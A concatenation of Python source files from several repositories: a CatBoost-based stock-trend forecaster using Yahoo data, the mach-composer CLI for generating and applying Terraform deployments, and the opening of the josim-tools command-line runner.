2. update from internet server: download from yahoo! up to today, and upon request save history
Args:
symbol (string, required): stock symbol. Default: ''
data_dir (string, optional): the directory of data files. Default: CWD, Currunt Working Directory
update_history (bool, optional): download history and info if 'update_history=True'. Default: False, load local files only
start_from_date (string, optional): the date to start downloading stock history. Default. '2015-01-01'
dump_files (bool, optional): save updated history and info into files if 'dump_files=True'. Default: False, don't write files
Examples:
>>> from tashares import Stockhist
>>> msft = Stockhist("MSFT")
>>> msft = Stockhist(symbol="MSFT")
>>> msft = Stockhist("MSFT", update_history=True)
>>> msft = Stockhist("MSFT", data_dir='/tmp')
>>> msft = Stockhist("MSFT", update_history=True, start_from_date='2020-01-01')
"""
start_from_date = config['DEFAULT']['StartFromDate']
historyfolder = config['DEFAULT']['HistoryFolder']
history = pd.DataFrame()
history_start_date: datetime
history_stop_date: datetime
def __init__(self, *args, **kwargs):
self.symbol = kwargs.get('symbol', '') if len(args) == 0 else args[0]
self.ticker = yf.Ticker(self.symbol)
self.data_dir = kwargs.get('data_dir', '')
if kwargs.get('update_history', False):
self.start_from_date = kwargs.get('start_from_date', self.start_from_date)
self.update_history(start_from_date=self.start_from_date)
else:
if self.data_dir.is_dir():
self.history = self.load_history(self.history_filename)
else:
logging.critical(f"{self.data_dir} is not a directory")
if kwargs.get('dump_files', False):
self.dump_history_file(self.history_filename)
def load_history(self, filename) -> pd.DataFrame:
try:
content = pd.read_csv(filename, sep='\t', parse_dates=True, index_col=[0])
assert not content.empty
# sort by date in case that is not ordered
content = content.sort_index()
self.history_start_date = content.index.min()
self.history_stop_date = content.index.max()
assert datetime.now() >= self.history_start_date
logging.debug(
f" {self.symbol} : loaded {len(content)} lines in {filename} from {self.history_start_date} to {self.history_stop_date}")
except:
logging.debug(f" history file '{filename}' nonexistent or broken")
content = pd.DataFrame()
finally:
return content
def update_history(self, start_from_date='2015-01-01', stop_at_date='') -> None:
if bool(self.ticker):
assert self.ticker.ticker == self.symbol
try:
content = self.ticker.history(
start=self.history.index.max() if (not self.history.empty) else datetime.strptime(start_from_date, '%Y-%m-%d'),
end=datetime.today() if stop_at_date == '' else datetime.strptime(stop_at_date, '%Y-%m-%d'),
auto_adjust=False, back_adjust=False, rounding=True)
if not content.empty:
content = content[pd.notnull(content.index.values)]
# merge with history loaded from file
#self.history = self.history.append(content)
self.history = pd.concat([self.history, content])
self.history = self.history[~self.history.index.duplicated(keep='last')]
self.history = self.history.sort_index()
self.history_start_date = self.history.index.min()
self.history_stop_date = self.history.index.max()
logging.debug(
f" {self.symbol} : downloaded history {len(self.history)} days, from {self.history_start_date} to {self.history_stop_date}")
except:
logging.critical(f"{self.symbol}: fail to download history")
def dump_history_file(self, filename) -> None:
if not self.history.empty and filename.parent.is_dir():
self.history.to_csv(filename, sep='\t',
encoding='utf-8', index=True, float_format='%.5f')
logging.info(f" {self.symbol} : write {len(self.history)} lines to {filename}")
@property
def history_filename(self):
return self.data_dir / f"{self.historyfolder}/{self.symbol}"
@property
def symbol(self):
return self._symbol
@symbol.setter
def symbol(self, value: str):
if value == '':
logging.warning(
f"__init__() missing 1 required positional argument: 'symbol', e.g. Stock('MSFT') or Stock(symbol='MSFT')...")
self._symbol = value
@property
def data_dir(self):
return self._data_dir
@data_dir.setter
def data_dir(self, value: str):
if not Path(value).is_dir():
logging.warning(f"data directory {value} does not exist")
self._data_dir = Path(value)
def __str__(self):
return f"{str(self.__class__)} : {self.symbol} : history {len(self.history)} days, {len(self.history.columns)} columns"
def __len__(self):
return len(self.history)
def __call__(self, *args, **kwargs):
self.update_history()
```
#### File: tashares/tashares/stockjob.py
```python
import pandas as pd
from datetime import datetime
import logging
import numpy as np
from tashares.cfg import config
from tashares.stockmeta import Stockmeta
rng = np.random.default_rng(seed=0)
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Stockjob(Stockmeta):
"""Generate ML features
Args:
symbol (string, required): stock symbol. Default: ''
forecast_days (int, optional): forecast which day in future. Default: 1, i.e. tomorrow
max_training_date (string, optional): the stopping date for training, to control training/test split. Default: '2021-01-01'
stack (int, optional): stacking features of multiple days. Default: 1, i.e. today's feature only
"""
stack: int = config.getint('DEFAULT', 'FeatureStacks')
forecast_jobs = config['DEFAULT']['ForecastJobs']
max_training_date = config['DEFAULT']['MaxTrainingDate']
features = pd.DataFrame()
max_shift = 0
def __init__(self, *args, **kwargs):
super(Stockjob, self).__init__(*args, **kwargs)
self.max_training_date = datetime.strptime(
kwargs.get('max_training_date', self.max_training_date), '%Y-%m-%d')
self.stack = kwargs.get('stack_features', self.stack)
self.update_features()
def update_features(self):
self.features = self.ta # reference only
if self.features.empty:
return
# stacking
original = self.ta[['open', 'high', 'low', 'close', 'volume']]
for stack in range(1, self.stack+1):
content = original.shift(stack)
content.columns = [
str(col) + f'_{stack}' for col in original.columns]
self.features = pd.concat([self.features, content], axis=1)
self._add_target()
self._add_meta()
logging.debug(f" {self.ticker.ticker} : {len(self.features.columns)} features")
def _add_target(self):
'''handcrafted a set of targets
'''
if self.features.empty:
return
for job in self.forecast_jobs.split(','):
forecast_days = int(job)
assert forecast_days > 0
if forecast_days > self.max_shift:
self.max_shift = forecast_days
target = (self.features['adj close'].shift(-forecast_days) -
self.features['adj close']) / self.features['adj close'] * 100.0
self.features = pd.concat(
[self.features, target.to_frame().rename(columns={'adj close': f"target_{forecast_days}"})], axis=1)
def _add_meta(self):
if self.features.empty:
return
# add symbol
if 'symbol' not in self.features.columns:
self.features.insert(0, 'symbol', self.ticker.ticker)
for key in ['shortName', 'sector', 'industry']:
if key.lower() not in self.features.columns:
if key in self.info:
result = self.info[key]
if not result:
result = 'unknown'
else:
result = 'unknown'
self.features.insert(len(self.features.columns), key.lower(),
result.replace(' ', '_').lower())
# add queryid
self.features['tag'] = np.random.randint(0, 1000, len(self.features))
self.features['queryid'] = self.features['date'].dt.strftime(
'%Y-%m-%d---') + self.features['sector'].apply(str)
def split_jobs(self, forecast_only=False) -> dict:
if self.features.empty:
if forecast_only:
return {'forecasting': pd.DataFrame()}
else:
return {'training': pd.DataFrame(), 'test': pd.DataFrame(), 'forecasting': pd.DataFrame()}
# remove first 90 days for burnout
self.features.drop(self.features.head(
90+self.max_shift).index, inplace=True)
self.features.reset_index(drop=True, inplace=True)
# remove the tail of max_shift in forecasting
forecast = self.features.tail(1)
forecast = forecast[(forecast['date'] > self.max_training_date)]
self.features.drop(self.features.tail(
self.max_shift).index, inplace=True)
has_NaN = self.features.isnull().sum().sum()
assert has_NaN == 0, f"{self.ticker} got {has_NaN} NaN problems!"
# split by 'max_training_date', print out training/test length
forecast = forecast[(forecast['date'] > self.max_training_date)]
test = self.features[(self.features['date'] > self.max_training_date)]
training = self.features[(
self.features['date'] <= self.max_training_date)]
if test.empty and forecast.empty:
logging.warning(f"{self.ticker.ticker}: no longer on listing, skip")
if not training.empty:
training.drop(training.index, inplace=True)
else:
logging.debug(
f" {self.ticker.ticker} : {len(training)} for training, {len(test)} in test, forecasting {len(forecast)}, with columns {len(self.features.columns)}")
if forecast_only:
return {'forecasting': forecast}
else:
return {'training': training, 'test': test, 'forecasting': forecast}
def __len__(self):
return len(self.features)
def __str__(self):
return '\n'.join([super(Stockjob, self).__str__(),
f"{str(self.__class__)} : {self.symbol} : {len(self.features)} samples, {len(self.features.columns)} features"])
def __call__(self, *args, **kwargs):
super(Stockjob, self).__call__(*args, **kwargs)
self.update_features()
```
#### File: tashares/tashares/stockmeta.py
```python
import json
import logging
from tashares.cfg import config
from tashares.stockta import Stockta
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Stockmeta(Stockta):
"""load/update stock info, include company name, sector, industry ...
"""
infofolder = config['DEFAULT']['InfoFolder']
def __init__(self, *args, **kwargs):
super(Stockmeta, self).__init__(*args, **kwargs)
if self.data_dir.is_dir():
self.info = self.load(self.info_filename)
if kwargs.get('update_history', False):
self.update()
if kwargs.get('dump_files', False):
self.dump_info_file(self.info_filename)
def load(self, info_filename) -> dict:
info = {}
try:
with open(info_filename) as d:
info = json.load(d)
logging.debug(
f" {self.ticker.ticker} : loaded {len(info)} pairs from {info_filename}")
except:
logging.debug(f" info file '{info_filename}' nonexistent or broken")
finally:
return info
def update(self) -> None:
if bool(self.ticker):
assert self.ticker.ticker == self.symbol
try:
self.info = self.ticker.info
logging.debug(
f" {self.ticker.ticker} : downloaded {len(self.info)} pairs")
except:
logging.warning(
f"{self.ticker.ticker}: info downloading is broken")
def dump_info_file(self, filename) -> None:
if filename.parent.is_dir() and len(self.info) > 2:
with open(filename, 'w') as d:
d.write(json.dumps(self.info))
logging.debug(f"{self.symbol}: write {len(self.info)} pairs to {filename}")
@property
def info_filename(self):
return self.data_dir / f"{self.infofolder}/{self.symbol}"
def __len__(self):
return len(self.info)
def __str__(self):
return '\n'.join([super(Stockmeta, self).__str__(),
f"{str(self.__class__)} : {self.symbol} : info {len(self.info)} pairs"])
def __call__(self, *args, **kwargs):
super(Stockmeta, self).__call__(*args, **kwargs)
self.update()
```
#### File: tashares/tashares/tashares.py
```python
import datetime
from pathlib import Path
import logging
import pandas as pd
import numpy as np
from catboost import CatBoostRanker, Pool
from tashares.cfg import config
from tashares.wrapper import wrap_stockjobs, load_data, upgrade_targets, compute_metrics
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
class Tashares(object):
"""forecast China A-share trend in next 1,2,5 days.
- Input: file name containing a symbol list.
- Output: predictive price trending of next 1,2,5 days.
Args:
symbol_list (string, optional): the file name of symbol list. Default: 'list_of_interest' under the folder 'data'
task_type (string, optional): China 'ashares' or US 'stocks' according to section names in cfg.ini. Default: 'ashares'
results_to_file (string, optional): the file to save results. Default: '' don't dump results
Examples:
>>> from tashares.tashares import Tashares
>>> tas = Tashares()
>>> tas()
>>> tas = Tashares(symbol_list="/absolute/path/to/list_of_ashares")
>>> tas()
>>> tas = Tashares("/absolute/path/to/list_of_ashares")
>>> tas()
"""
def __init__(self, *args, **kwargs):
self.task_type = kwargs.get('task_type', 'ashares')
self.results_file = kwargs.get('results_to_file', '')
self.data_dir = Path(__file__).parent / 'data/' / self.task_type
self.models_files = config[self.task_type]['ModelList'].split(',')
self.symbol_list = kwargs.get('symbol_list', self.data_dir /
config[self.task_type]['SymbolsOfInterest']) if len(args) == 0 else args[0]
# test purpose
self.dump_data_to = kwargs.get('dump_data_to', self.data_dir / 'forecast.data')
self.load_data_from = kwargs.get('load_data_from', '')
if self.load_data_from != '':
self.forecasting_data = load_data(self.load_data_from, queryid='date')
self.forecasting_data = upgrade_targets(self.forecasting_data)
else:
self.forecasting_data = pd.DataFrame()
def dump_forecast_data(self):
if self.forecasting_data.empty == False:
self.forecasting_data.to_csv(Path(self.dump_data_to), sep='\t', encoding='utf-8',
index=False, float_format='%.6f', header=True, )
def forecast(self):
if self.forecasting_data.empty:
data = wrap_stockjobs(
symbols_file=self.symbol_list,
data_dir=self.data_dir,
update_history=True,
forefast_only=True,
dump_files=False,
)
self.forecasting_data = data['forecasting']
forecasting_data = self.forecasting_data
if self.task_type == 'ashares':
drop_list = ['symbol', 'date', 'queryid', 'sector', 'industry', 'shortname', 'tag', ] + \
[c for c in forecasting_data.columns if c.lower()[:6] == 'target' or c.lower()[:6] == '_label']
else:
drop_list = ['symbol', 'date', 'queryid', 'sector', 'industry', 'shortname', 'tag', 'adj close'] + \
[c for c in forecasting_data.columns if c.lower()[:6] == 'target' or c.lower()[:6] == '_label']
forecasting_pool = Pool(
data=forecasting_data.drop(drop_list, axis=1).values,
label=forecasting_data['tag'].values,
group_id=forecasting_data['queryid'].values
)
result = pd.DataFrame()
score = np.zeros(len(forecasting_data))
cb = CatBoostRanker()
for model_file in self.models_files:
cb.load_model(self.data_dir / model_file, format="cbm")
prediction = cb.predict(forecasting_pool)
result[Path(model_file).stem] = prediction
score += prediction
# run compute metrics for test case
if self.load_data_from != '':
return compute_metrics(forecasting_data, prediction)
score = score / len(self.models_files)
#forecasting_data.reset_index(drop=False, inplace=True)
result = pd.concat([forecasting_data[['symbol', 'date']], result], axis=1)
result['score'] = score
result = pd.concat([result, forecasting_data['shortname']], axis=1)
result = pd.concat([result, forecasting_data['sector']], axis=1)
result = result.sort_values(['date', 'score'], ascending=False)
result.reset_index(drop=True, inplace=True)
result.insert(0, 'rank', result.index)
# save prediction
if self.results_file != '':
result.to_csv(self.results_file, sep='\t', encoding='utf-8',
index=False, float_format='%.5f')
logging.info(f" today: {datetime.date.today().strftime('%Y-%m-%d')}")
logging.info(f" symbol list: {self.symbol_list}")
logging.info(f"results of {len(result)} ashares saved in {self.results_file}")
# from sendemail import send_mail
# send_mail([f"{self.results_file}", ])
return result
def __call__(self, *args, **kwargs):
return self.forecast()
```
#### File: tashares/tashares/wrapper.py
```python
from concurrent import futures
import multiprocessing
import logging
from pathlib import Path
import pandas as pd
from catboost.utils import eval_metric
from tashares.cfg import config
from tashares.stockjob import Stockjob
logging.basicConfig(format='%(asctime)s %(levelname)s:%(message)s',
level=logging.INFO,
datefmt='%m/%d/%Y %I:%M:%S %p')
MAX_WORKERS = max(multiprocessing.cpu_count()-1, 1)
wrapper_parameters = {
'data_dir': '',
'forecast_only': False,
'dump_files': False,
'start_from_date': '2015-01-01',
'max_training_date': '2020-01-01',
'update_history': False,
}
def get_stockjob(symbol):
return Stockjob(symbol=symbol.strip(),
data_dir=wrapper_parameters['data_dir'],
update_history=wrapper_parameters['update_history'],
start_from_date=wrapper_parameters['start_from_date'],
dump_files=wrapper_parameters['dump_files'],
).split_jobs(forecast_only=wrapper_parameters['forecast_only'])
def wrap_stockjobs(symbols_file: str, **kwargs):
'''generate training/test/forecasting data files
- Input: a file of stock symbol list.
- Output: a dictionary of three pandas dataframes for training/test/forecasting data respectively.
Args:
symbols_file (string, required): the file of stock symbol list.
data_dir (string, required): the directory for data files which needs exist already.
forefast_only (bool, optional): only generate forecasting data if 'forefast_only=True'. Default: False
dump_files (bool, optional): save data into files if 'force_dump=True' and data_dir exists. Default: False
max_training_date (string, optional): the stopping date for training, to control training/test split. Default: '2021-01-01'
stack_features (int, optional): the number of days for stacking in feature engineering. Default: 1
update_history (bool, optional): download the latest history if 'update=True', otherwise use history saved under data_dir. Default: False
forecast_days (int, optional): the day in future for forecasting. Default: 1, i.e. predict tomorrow's
'''
wrapper_parameters.update(kwargs)
logging.debug(f"wrapper_parameters {wrapper_parameters}")
data = {}
with open(symbols_file, encoding='utf8') as f:
job_list = (symbol.strip() for symbol in f)
with futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
to_do: list[futures.Future] = []
for symbol in job_list:
future = executor.submit(get_stockjob, symbol)
to_do.append(future)
logging.debug(f'Scheduled for {symbol}: {future}')
for count, future in enumerate(futures.as_completed(to_do), 1):
res: dict = future.result()
for key, value in res.items():
if key not in data.keys():
data[key] = pd.DataFrame()
if not value.empty:
data[key] = pd.concat([data[key], value], axis=0)
logging.debug(f" {count} futures as completed")
def sort_queryid(df):
if not df.empty:
df = df.sort_values(['date', 'queryid'])
df.reset_index(drop=True, inplace=True)
return df
for key in data.keys():
data[key] = sort_queryid(data[key])
logging.debug(f" {key} samples {len(data[key])}")
return data
def dump_stockjobs(task_type, data_dir: Path, **data):
if not data_dir.is_dir():
logging.warning(f"{data_dir} doesn't exist")
else:
for key in data.keys():
filename = data_dir / f"{key}_{task_type}.csv"
if filename.exists():
logging.warning(f"{filename} already exists, skip dumping")
continue
data[key].to_csv(filename, sep='\t', encoding='utf-8', index=False, float_format='%.4f',
header=not filename.exists())
logging.info(f"{key} {len(data[key])} samples saved in {filename}")
def dump_datafiles(symbol_list='', data_dir='', task_type='ashares'):
'''save training/test/forecasting data into files
- Input: a file of stock symbol list.
- Output: three csv files for training/test/forecasting data respectively under the folder data_dir.
Args:
symbol_list (string, optional): the file of stock symbol list. Default: 'SymbolList' in cfg.ini
data_dir (string, optional): the directory to save files. Default: current working directory
'''
if data_dir == '':
data_dir = Path.cwd()
if symbol_list == '':
symbol_list = Path(__file__).parent / 'data/ashares/' / config['ashares']['SymbolList']
data = wrap_stockjobs(
symbol_list,
data_dir=data_dir,
start_from_date=config['DEFAULT']['StartFromDate'],
max_training_date=config['DEFAULT']['MaxTrainingDate'],
forefast_only=False,
dump_files=False,
update_history=True,)
dump_stockjobs(task_type, Path(data_dir), **data,)
def load_data(data_file, queryid='date'):
try:
tp = pd.read_csv(data_file, sep='\t', iterator=True, chunksize=10000, dtype={
"date": "category", "symbol": "category", "queryid": "category"})
data = pd.concat(tp, ignore_index=True)
data = data.sort_values([queryid, 'queryid'])
data.reset_index(drop=True, inplace=True)
# encode categorical features
cols = ['date', 'symbol', 'queryid', 'sector', 'industry', 'shortname']
for col in cols:
data[col] = data[col].astype("category").cat.codes + 1
logging.info(f"{data_file} loaded")
except:
logging.critical(f"loading {data_file} failed")
data = pd.DataFrame()
return data
def upgrade_targets(data, forecast_job='1', threshold=10):
if data.empty:
return data
targets = [c for c in data.columns if c.lower()[:6] == 'target']
assert len(targets) > 0
data['target'] = data[f"target_{forecast_job}"]
data['binary_label'] = data['target'].transform(
lambda x: 1 if x >= 0 else 0)
return data
def compute_metrics(labels, y_pred, queryid='date'):
result = [eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=5', group_id=labels[queryid]),
eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=10', group_id=labels[queryid]),
eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=20', group_id=labels[queryid]),
eval_metric(labels['binary_label'], y_pred, 'PrecisionAt:top=50', group_id=labels[queryid]), ]
return result
if __name__ == '__main__':
dump_datafiles()
``` |
{
"source": "joeydebreuk/mach-composer",
"score": 2
} |
#### File: src/mach/build.py
```python
import os.path
import subprocess
import sys
from typing import TYPE_CHECKING, Optional
if TYPE_CHECKING:
from mach.types import LocalArtifact, MachConfig
def build_packages(config: "MachConfig", restrict_components=None):
for component in config.components:
if restrict_components and component.name not in restrict_components:
continue
for artifact, artifact_cfg in component.artifacts.items():
build_artifact(artifact_cfg)
def build_artifact(artifact: "LocalArtifact"):
run_script(artifact.script, artifact.workdir)
if artifact.workdir:
artifact.filename = os.path.abspath(
os.path.join(artifact.workdir, artifact.filename)
)
else:
artifact.filename = os.path.abspath(artifact.filename)
if not os.path.exists(artifact.filename):
raise ValueError(f"The file {artifact.filename} doesn't exist")
def run_script(script: str, workdir: Optional[str]):
p = subprocess.run(
script, stdout=sys.stdout, stderr=sys.stderr, shell=True, cwd=workdir
)
p.check_returncode()
```
#### File: src/mach/commands.py
```python
import glob
import subprocess
import sys
from functools import update_wrapper
from typing import List, Optional
import click
from mach import bootstrap as _bootstrap
from mach import git, parse, updater
from mach.build import build_packages
from mach.exceptions import MachError
from mach.terraform import apply_terraform, generate_terraform, plan_terraform
class Command(click.Command):
def invoke(self, ctx):
try:
return super().invoke(ctx)
except MachError as e:
raise click.ClickException(str(e)) from e
class Group(click.Group):
def command(self, *args, **kwargs):
kwargs.setdefault("cls", Command)
return super().command(*args, **kwargs)
@click.group(cls=Group)
def mach():
pass
def terraform_command(f):
@click.option(
"-f",
"--file",
default=None,
help="YAML file to parse. If not set parse all *.yml files.",
)
@click.option(
"-s",
"--site",
default=None,
help="Site to parse. If not set parse all sites.",
)
@click.option(
"--ignore-version",
is_flag=True,
default=False,
help="Skip MACH composer version check",
)
@click.option(
"--output-path",
default="deployments",
help="Output path, defaults to `cwd`/deployments.",
)
def new_func(file, site, output_path: str, ignore_version: bool, **kwargs):
files = get_input_files(file)
configs = parse.parse_configs(files, output_path, ignore_version=ignore_version)
try:
result = f(
file=file,
site=site,
configs=configs,
**kwargs,
)
except subprocess.CalledProcessError as e:
click.echo("Failed to run")
sys.exit(e.returncode)
else:
click.echo("Done 👍")
return result
return update_wrapper(new_func, f)
@mach.command()
@terraform_command
def generate(file, site, configs, *args, **kwargs):
"""Generate the Terraform files."""
for config in configs:
generate_terraform(config, site=site)
@mach.command()
@click.option(
"--with-sp-login",
is_flag=True,
default=False,
help="If az login with service principal environment variables "
"(ARM_CLIENT_ID, ARM_CLIENT_SECRET, ARM_TENANT_ID) should be done.",
)
@click.option(
"-c",
"--component",
multiple=True,
default=False,
help="",
)
@click.option(
"--reuse",
default=False,
is_flag=True,
help="Supress a terraform init for improved speed (not recommended for production usage)",
)
@terraform_command
def plan(file, site, configs, with_sp_login, component, reuse, *args, **kwargs):
"""Output the deploy plan."""
for config in configs:
generate_terraform(config, site=site)
plan_terraform(
config,
site=site,
components=component,
with_sp_login=with_sp_login,
reuse=reuse,
)
@mach.command()
@click.option(
"--with-sp-login",
is_flag=True,
default=False,
help="If az login with service principal environment variables "
"(ARM_CLIENT_ID, ARM_CLIENT_SECRET, ARM_TENANT_ID) should be done.",
)
@click.option(
"--auto-approve",
is_flag=True,
default=False,
help="",
)
@click.option(
"-c",
"--component",
multiple=True,
default=False,
help="",
)
@click.option(
"--reuse",
is_flag=True,
default=False,
help="Supress a terraform init for improved speed (not recommended for production usage)",
)
@terraform_command
def apply(
file,
site,
configs,
with_sp_login,
auto_approve,
component,
reuse,
*args,
**kwargs,
):
"""Apply the configuration."""
for config in configs:
build_packages(config, restrict_components=component)
generate_terraform(config, site=site)
apply_terraform(
config,
site=site,
components=component,
with_sp_login=with_sp_login,
auto_approve=auto_approve,
reuse=reuse,
)
@mach.command()
@click.option(
"-f",
"--file",
default=None,
help="YAML file to update. If not set update all *.yml files.",
)
@click.option("-v", "--verbose", is_flag=True, default=False, help="Verbose output.")
@click.option(
"--check",
default=False,
is_flag=True,
help="Only checks for updates, doesnt change files.",
)
@click.option(
"-c",
"--commit",
default=False,
is_flag=True,
help="Automatically commits the change.",
)
@click.option(
"-m", "--commit-message", default=None, help="Use a custom message for the commit."
)
@click.argument("component", required=False)
@click.argument("version", required=False)
def update(
file: str,
check: bool,
verbose: bool,
component: str,
version: str,
commit: bool,
commit_message: str,
):
"""Update all (or a given) component.
When no component and version is given, it will check the git repositories for any updates.
This command can also be used to manually update a single component by specifying a component
and version.
"""
if check and commit:
raise click.ClickException(
"check_only is not possible when create_commit is enabled."
)
if component and not version:
if "@" not in component:
raise click.ClickException(
f"When specifying a component ({component}) you should specify a version as well"
)
component, version = component.split("@")
for file in get_input_files(file):
updater.update_file(
file,
component_name=component,
new_version=version,
verbose=verbose,
check_only=check,
)
if commit:
git.add(file)
if commit:
if commit_message:
commit_msg = commit_message
elif component:
commit_msg = f"Updated {component} component"
else:
commit_msg = "Updated components"
git.commit(commit_msg)
@mach.command()
@click.option(
"-f",
"--file",
default=None,
help="YAML file to read. If not set read all *.yml files.",
)
def components(file: str):
"""List all components."""
files = get_input_files(file)
configs = parse.parse_configs(files)
for config in configs:
click.echo(f"{config.file}:")
for component in config.components:
click.echo(f" - {component.name}")
click.echo(f" version: {component.version}")
click.echo("")
@mach.command()
@click.option(
"-f",
"--file",
default=None,
help="YAML file to read. If not set read all *.yml files.",
)
def sites(file: str):
"""List all sites."""
files = get_input_files(file)
configs = parse.parse_configs(files)
for config in configs:
click.echo(f"{config.file}:")
for site in config.sites:
click.echo(f" - {site.identifier}")
click.echo(" components:")
for component in site.components:
click.echo(f" {component.name}")
click.echo("")
@mach.command()
@click.option(
"-o",
"--output",
help="Output file or directory.",
)
@click.option(
"-c",
"--cookiecutter",
default="",
help="cookiecutter repository to generate from.",
)
@click.argument("type_", required=True, type=click.Choice(["config", "component"]))
def bootstrap(output: str, type_: str, cookiecutter: str):
"""Bootstraps a configuration or component."""
if type_ == "config":
_bootstrap.create_configuration(output or "main.yml")
if type_ == "component":
_bootstrap.create_component(output, cookiecutter)
def get_input_files(file: Optional[str]) -> List[str]:
"""Determine input files. If file is not specified use all *.yml files."""
if file:
files = [file]
else:
files = glob.glob("./*.yml")
if not files:
click.echo("No .yml files found")
sys.exit(1)
return files
```
#### File: src/mach/terraform.py
```python
import os
import re
import subprocess
import sys
from pathlib import Path
from typing import List, Optional, Union
import click
from mach.templates import setup_jinja
from mach.types import MachConfig, Site
def generate_terraform(config: MachConfig, *, site: str = None):
"""Generate Terraform file from template and reformat it."""
env = setup_jinja()
template = env.get_template("site.tf")
sites = _filter_sites(config.sites, site)
for s in sites:
site_dir = config.deployment_path / Path(s.identifier)
site_dir.mkdir(exist_ok=True)
output_file = site_dir / Path("site.tf")
content = _clean_tf(
template.render(
config=config,
general_config=config.general_config,
site=s,
)
)
with open(output_file, "w+") as fh:
fh.write(content)
click.echo(f"Generated file {output_file}")
run_terraform("fmt", cwd=site_dir)
def _clean_tf(content: str) -> str:
"""Clean the Terraform file.
The pyhcl (used in testing for example) doesn't like empty objects with newlines
for example. Let's get rid of those.
"""
return re.sub(r"\{(\s*)\}", "{}", content)
def plan_terraform(
config: MachConfig,
*,
site: str = None,
components: List[str] = [],
with_sp_login: bool = False,
reuse=False,
):
"""Terraform init and plan for all generated sites."""
sites = _filter_sites(config.sites, site)
for s in sites:
site_dir = config.deployment_path / Path(s.identifier)
if not site_dir.is_dir():
click.echo(f"Could not find site directory {site_dir}")
continue
click.echo(f"Terraform plan for {site_dir.name}")
if not reuse:
run_terraform("init", site_dir)
if with_sp_login:
azure_sp_login()
cmd = ["plan"]
for component in components:
cmd.append(f"-target=module.{component}")
run_terraform(cmd, site_dir)
def apply_terraform(
config: MachConfig,
*,
site: str = None,
components: List[str] = [],
with_sp_login: bool = False,
auto_approve: bool = False,
reuse=False,
):
"""Terraform apply for all generated sites."""
sites = _filter_sites(config.sites, site)
for s in sites:
site_dir = config.deployment_path / Path(s.identifier)
if not site_dir.is_dir():
click.echo(f"Could not find site directory {site_dir}")
continue
click.echo(f"Applying Terraform for {s.identifier}")
if not reuse:
run_terraform("init", site_dir)
if with_sp_login:
azure_sp_login()
cmd = ["apply"]
if auto_approve:
cmd += ["-auto-approve"]
for component in components:
cmd.append(f"-target=module.{component}")
run_terraform(cmd, site_dir)
def azure_sp_login():
"""Login the service principal with az cli."""
p = subprocess.run(
[
"az",
"login",
"--service-principal",
"-u",
os.environ["ARM_CLIENT_ID"],
"-p",
os.environ["ARM_CLIENT_SECRET"],
"--tenant",
os.environ["ARM_TENANT_ID"],
],
stdout=sys.stdout,
stderr=sys.stderr,
)
p.check_returncode()
def run_terraform(command: Union[List[str], str], cwd):
"""Run any Terraform command."""
if isinstance(command, str):
command = [command]
p = subprocess.run(
["terraform", *command], cwd=cwd, stdout=sys.stdout, stderr=sys.stderr
)
p.check_returncode()
def _filter_sites(sites: List[Site], site_identifier: Optional[str]) -> List[Site]:
if not site_identifier:
return sites
return [s for s in sites if s.identifier == site_identifier]
```
#### File: unittests/types/test_site.py
```python
import pytest
from mach import parse, types
def test_site(config: types.MachConfig):
config.components.append(
types.ComponentConfig(
name="private-api",
source="some-private-source/terraform",
version="1.0",
)
)
config.sites[0].components.append(types.Component(name="private-api"))
config.sites[0].endpoints = [
types.Endpoint(
key="public",
url="api.example.com",
),
types.Endpoint(
key="private",
url="private-api.example.com",
),
]
config = parse.parse_config(config)
site = config.sites[0]
assert site.used_endpoints == []
config.components[0].endpoints = {
"main": "public",
}
config = parse.parse_config(config)
assert site.used_endpoints == [
types.Endpoint(
key="public", url="api.example.com", components=[site.components[0]]
)
]
config.components[1].endpoints = {
"main": "public",
}
config = parse.parse_config(config)
assert site.used_endpoints == [
types.Endpoint(
key="public",
url="api.example.com",
components=[site.components[0], site.components[1]],
)
]
config.components[1].endpoints = {
"main": "private",
}
config = parse.parse_config(config)
assert site.used_endpoints == [
types.Endpoint(
key="public",
url="api.example.com",
components=[
site.components[0],
],
),
types.Endpoint(
key="private",
url="private-api.example.com",
components=[site.components[1]],
),
]
def test_hybrid_endpoints():
endpoints_flat = {
"main": "api.example.com",
"private": "private.example.com",
}
endpoints_complex = {
"main": {
"url": "api.example.com",
},
"private": {
"url": "private.example.com",
},
}
site_schema = types.Site.schema(infer_missing=True)
for input_ in [endpoints_flat, endpoints_complex]:
site = site_schema.load({"identifier": "nl-unittest", "endpoints": input_})
assert site.endpoints == [
types.Endpoint(
key="main",
url="api.example.com",
),
types.Endpoint(
key="private",
url="private.example.com",
),
]
serialized = site_schema.dump(site)
assert serialized["endpoints"] == endpoints_flat
def test_hybrid_endpoints_wrong_value():
with pytest.raises(Exception):
types.Site.schema(infer_missing=True).load(
{"identifier": "nl-unittest", "endpoints": ["bla", "bla"]}
)
``` |
{
"source": "JoeyDelp/josim-tools",
"score": 2
} |
#### File: josim-tools/josim_tools/tools.py
```python
import os
os.system("")
from typing import Any, Tuple, Dict
from multiprocessing import cpu_count
from argparse import ArgumentParser
from toml import load as toml_load
from jsonschema import (
validate as schema_validate,
ValidationError as SchemaValidationError,
)
from . import __version__
from .verify import Verifier
from .analysis import MarginAnalysis, print_margin_analysis_result, YieldAnalysis
from .optimize import Optimizer
from .schema import CONFIG as SCHEMA_CONFIG
from .configuration import (
VerifyConfiguration,
MarginAnalysisConfiguration,
YieldAnalysisConfiguration,
OptimizeConfiguration,
MarginParameterConfiguration,
OptimizerParameterConfiguration,
YieldParameterConfiguration,
)
def run() -> None:
""" Run the tool parsing the commandline arguments """
parser = ArgumentParser(
description="Circuit tools built on JoSIM",
epilog="For further assistance please refer to https://joeydelp.github.io/josim-tools")
parser.add_argument("configuration", type=str, help="configuration.toml file")
parser.add_argument("-v", "--version", action="version", version=f"JoSIM Tools {__version__}")
parser.add_argument("-V","--verbose", action="store_true", default=False, help="enables verbose display of operations")
parser.add_help = True
parser.allow_abbrev = True
args = parser.parse_args()
print(f"JoSIM Tools {__version__}")
if args.verbose:
print("Verbose mode enabled")
